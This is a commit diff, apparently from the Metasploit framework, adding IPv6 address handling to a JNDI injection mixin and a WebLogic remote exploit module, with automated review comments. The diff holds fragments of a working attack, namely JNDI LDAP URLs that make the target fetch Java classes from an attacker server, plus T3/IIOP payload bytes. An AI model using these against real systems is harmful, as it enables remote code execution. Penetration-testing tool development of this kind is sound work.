Add more IPv6 support in to the module

Grant Willcox 2023-06-09 12:24:35 -05:00
parent 7ca7c6aee1
commit 694c1006e4
No known key found for this signature in database
GPG Key ID: 67522945A18C5562
3 changed files with 11 additions and 14 deletions


@ -384,7 +384,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.51)
rex-socket (0.1.52)
rex-core
rex-sslscan (0.1.9)
rex-core


@ -29,7 +29,7 @@ module Exploit::Remote::JndiInjection
# @return [String] the JNDI string
def jndi_string(resource = nil)
resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
"ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
"ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
end
## LDAP service callbacks
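Review bot: `jndi_string` still embeds `datastore['SRVHOST']` without checking that it is a specific address, because the wildcard guard this commit introduces lives only in one module's `exploit` method. Other consumers of this mixin would therefore still build a URL around `0.0.0.0` or `::`; moving that guard into the mixin as a shared helper would cover every caller. The YARD comment could also record the new formatting, for example `# @return [String] the JNDI string; an IPv6 literal SRVHOST is wrapped in brackets`. `Rex::Socket.to_authority` presumably depends on the rex-socket bump in the lockfile section, so any version floor declared elsewhere (not visible here) should match it.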


@ -299,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
# this URL when it tries to fetch the class to be loaded and instantiated.
def ldap_url_string
"http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}/"
"http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
end
#
@ -334,14 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
netloc = opts['ServerHost'] || bindhost
http_srvport = (opts['ServerPort'] || bindport).to_i
if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
if Rex::Socket.is_ipv6?(netloc)
netloc = "[#{netloc}]:#{http_srvport}"
else
netloc = "#{netloc}:#{http_srvport}"
end
end
print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
print_status("Serving Java code on: #{proto}://#{Rex::Socket.to_authority(netloc, http_srvport)}#{uopts['Path']}")
# Add path to resource
@service_path = uopts['Path']
@ -404,6 +397,10 @@ class MetasploitModule < Msf::Exploit::Remote
# Main Exploit
def exploit
if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
fail_with(Failure::BadConfig, 'SRVHOST must be set to a routable address!')
end
if @version.blank?
@version = get_weblogic_version
end
@ -411,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Step 1 - Make T3 connection to start IIOP connection process, and read response.
socket = connect
print_status('1. Making T3 connection...')
socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}\n\n")
_buf = socket.get
disconnect
print_good('Made T3 connection!')
@ -490,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
key1 = locate_buf[foff...foff + 8]
key2 = "\xff\xff\xff\xff" + locate_buf[foff + 4...foff + 8]
if @version.between?(Rex::Version.new('12.0.0.0.0'), Rex::Version.new('12.9999999.999999.999999.99999'))
if @version >= Rex::Version.new('12') && @version < Rex::Version.new('13')
wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
"\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
"\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x02\x38\x00\x00\x00\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
@ -499,7 +496,7 @@ class MetasploitModule < Msf::Exploit::Remote
"\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
"\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x04{{key3}}\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
"\x00\x00\x00\x00\x00\x00\x00{{key1}}"
elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
elsif @version >= Rex::Version.new('14') && @version < Rex::Version.new('15')
wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64" \
"\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49\x44\x4c\x3a\x77\x65\x62\x6c" \
"\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d" \
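Review bot: The two version branches in the last two hunks are now half-open ranges (`>= Rex::Version.new('12') && < Rex::Version.new('13')` and the matching 14/15 pair), and nothing visible handles a `@version` that falls in neither, such as 13.x or anything below 12. If no `else` follows outside the hunks, `wls_key_1` presumably stays unset and the failure surfaces later as an unrelated error; an explicit `else fail_with(Failure::NoTarget, "Unsupported WebLogic version: #{@version}")` would report it clearly. The `if`/`elsif` chain starts and ends outside the hunks, so this needs confirming against the full method. Separately, the new SRVHOST guard in `exploit` rejects only all-zero IP literals and skips hostnames entirely, so its message would be more accurate as `'SRVHOST must not be a wildcard address (0.0.0.0 or ::)'` than as a promise of routability.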